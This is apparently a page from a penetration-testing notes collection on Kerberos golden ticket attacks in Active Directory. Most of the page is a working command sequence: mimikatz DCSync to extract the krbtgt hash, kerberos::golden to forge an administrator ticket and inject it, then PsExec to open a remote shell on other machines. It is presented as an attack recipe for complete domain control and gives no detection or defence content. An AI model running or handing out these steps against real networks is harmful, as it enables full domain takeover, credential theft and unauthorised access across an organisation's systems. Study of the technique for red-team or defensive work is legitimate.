Golden Ticket Attacks

What is it?

When the krbtgt account is compromised, the domain is owned
Access can be requested to any resource or system on the domain
Golden tickets == complete access to every machine// Some code

Golden Ticket Creation

# Start mimikatz with privilege::debug

# Grab the krbtgt hash using DCSync
lsadump::dcsync /user:DOMAIN\\krbtgt

# Grab the domain SID and the krbtgt password hash
# Generate the Golden ticket
kerberos::golden /User:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /id:500 /ptt

# Now you should be able to open sessions using the golden ticket
misc::cmd

# Now you should be able to access all resources using the golden ticket
# For example: start a remote cmd.exe using psexec
PsExec.exe \\REMOTE_IP cmd.exe

Reference: Attacking Kerberos

PreviousDumping the NTDS.dit NextPost Exploitation

Last updated 5 months ago